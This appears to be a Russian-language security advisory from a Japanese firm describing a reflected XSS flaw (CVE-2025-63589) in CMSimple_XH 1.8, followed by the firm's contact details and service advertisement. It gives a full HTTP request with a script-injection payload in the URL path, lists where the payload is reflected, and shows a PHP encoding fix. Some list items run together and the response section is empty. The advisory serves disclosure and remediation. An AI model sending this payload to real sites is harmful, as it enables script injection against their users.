
Отраженный XSS proof-of-concept для CMSimple_XH 1.8 с неаутентифицированной инъекцией скриптов через несанитизированные сегменты пути, включая оценку CVSS 6.1 и пример исправления на PHP.
Обнаружено: 6 октября 2025 г.
Продукт: CMSimple_XH (CMS на плоских файлах с открытым исходным кодом)
Затронутые версии: 1.8
CVE: CVE-2025-63589
Требуется аутентификация: Не требуется (без аутентификации)
Тип атаки: Отражённый межсайтовый скриптинг (XSS)
Оценочный CVSS v3.1: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N → 6.1 (Средний)
Фронт-контроллер в index.php принимает динамические сегменты пути (используемые для маршрутизации к шаблонам/страницам) и передаёт эти значения в рендеринг шаблонов. Код не выполняет надлежащую санитизацию и HTML-кодирование этих сегментов пути перед вставкой в атрибуты и href якорей. В результате специально сформированный URI запроса, содержащий такие символы, как ">, и внедрённые теги (например, <script>...</script>), без изменений отражается в HTML-вывод и выполняется браузером.
Типичные точки отражения включают:
action форм (например, формы входа/поиска)href пунктов навигации/меню<nav class="locator">)Print view, Sitemap, Login и т. д.)Поскольку входные данные попадают в контексты HTML-атрибутов и содержимое якорей, требуется стандартное кодирование атрибутов, но оно отсутствует.
Запрос:
POST /cmsimplexh/index.php/gjtqw"><script>alert(1)</script>co2cu HTTP/1.1
Host: 192.168.98.129:8080
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Origin: http://192.168.98.129:8080
Upgrade-Insecure-Requests: 1
Referer: http://192.168.98.129:8080/cmsimplexh/?Templates/TEMPLATE-overlay_03
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: "Chromium";v="138", "Not;A=Brand";v="24", "Google Chrome";v="138"
Sec-CH-UA-Platform: "Windows"
Sec-CH-UA-Mobile: ?0
Content-Length: 32
search=Search...&function=search

Ответ:


Внедрённая полезная нагрузка gjtqw"><script>alert(1)</script>co2cu без кодирования отражается в ссылки меню, хлебные крошки, атрибут action формы поиска и ссылки подвала, что приводит к выполнению скрипта при рендеринге страницы.
$safe_segment = rawurlencode($segment); // path-safety
$action = '/cmsimplexh/index.php/' . $safe_segment;
echo '<form action="' . htmlspecialchars($action, ENT_QUOTES, 'UTF-8') . '">';
HttpOnly)По любым вопросам и предложениям, пожалуйста, обращайтесь к нам.

📞 Тел.: 03-6853-5823
📧 Эл. почта: [email protected]
| Пункт | Содержание |
|---|---|
| Название компании | 株式会社CyberCrew |
| Адрес | 1-18-13 Сотоканда, Тиёда-ку, Токио, Акихабара Дайбиру, 6-й этаж |
Проводим многосторонний анализ уязвимостей организации и предлагаем оптимальные меры по их устранению.
Выполняем целевые и сценарные тесты, включая LLM-пентесты.
Раннее обнаружение утечек конфиденциальной информации и оперативное реагирование.
Оценка защищённости на основе практических сценариев атак.
Помогаем закладывать безопасность в проект с ранних этапов разработки.
🌐 Официальный сайт: https://www.cybercrew.co.jp
🕒 CyberCrew — ваш надёжный партнёр в области безопасности.